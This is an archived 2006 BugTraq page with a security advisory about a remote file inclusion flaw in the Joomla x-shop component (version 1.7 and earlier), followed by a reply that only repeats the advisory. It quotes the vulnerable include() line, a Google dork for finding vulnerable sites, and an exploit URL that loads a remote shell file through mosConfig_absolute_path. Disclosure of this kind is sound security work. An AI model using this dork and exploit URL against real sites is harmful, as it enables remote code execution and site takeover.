BugTraq
Back to list
|
Post reply
Joomla x-shop <= 1.7 Remote File Include Vulnerability
Aug 18 2006 10:04AM
crackers_child sibersavascilar com
(1 replies)
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
------------------------------------------------------------------------
--------
Title : Joomla x-shop <= 1.7 Remote File Include Vulnerability
------------------------------------------------------------------------
--------
#Author: Crackers_Child
#cont@ct: crackers_child (at) sibersavascilar (dot) com [email concealed]
------------------------------------------------------------------------
--------
Google Dorks : allinurl:"/com_x-shop/"
------------------------- -------------------------------------------------------
Download : http://mamboxchange.com/frs/?group_id=187&release_id=1047
------------------------------------------------------------------------
--------
Bug in admin.x-shop.php
<?
include($mosConfig_absolute_path.'/administrator/components/com_x-shop/l
anguages/'.$mosConfig_lang.'.php');
session_start();
------------------------------------------------------------------------
--------
Exploit:
http://www.site.com/joomla_path/administrator/components/com_x-shop/admi
n.x-shop?mosConfig_absolute_path=Shell.txt?
------------------------------------------------------------------------
--------
greets:
All My Friends And SiberSavascilar.Com Members !
------------------------------------------------------------------------
--------
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
[ reply ]
Re: Joomla x-shop <= 1.7 Remote File Include Vulnerability
Aug 18 2006 10:51PM
Carsten Eilers (ceilers-lists gmx de)
Privacy Statement
Copyright 2010, SecurityFocus
------------------------------------------------------------------------
--------
Title : Joomla x-shop <= 1.7 Remote File Include Vulnerability
------------------------------------------------------------------------
--------
#Author: Crackers_Child
#cont@ct: crackers_child (at) sibersavascilar (dot) com [email concealed]
------------------------------------------------------------------------
--------
Google Dorks : allinurl:"/com_x-shop/"
------------------------- -------------------------------------------------------
Download : http://mamboxchange.com/frs/?group_id=187&release_id=1047
------------------------------------------------------------------------
--------
Bug in admin.x-shop.php
<?
include($mosConfig_absolute_path.'/administrator/components/com_x-shop/l
anguages/'.$mosConfig_lang.'.php');
session_start();
------------------------------------------------------------------------
--------
Exploit:
http://www.site.com/joomla_path/administrator/components/com_x-shop/admi
n.x-shop?mosConfig_absolute_path=Shell.txt?
------------------------------------------------------------------------
--------
greets:
All My Friends And SiberSavascilar.Com Members !
------------------------------------------------------------------------
--------
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
[ reply ]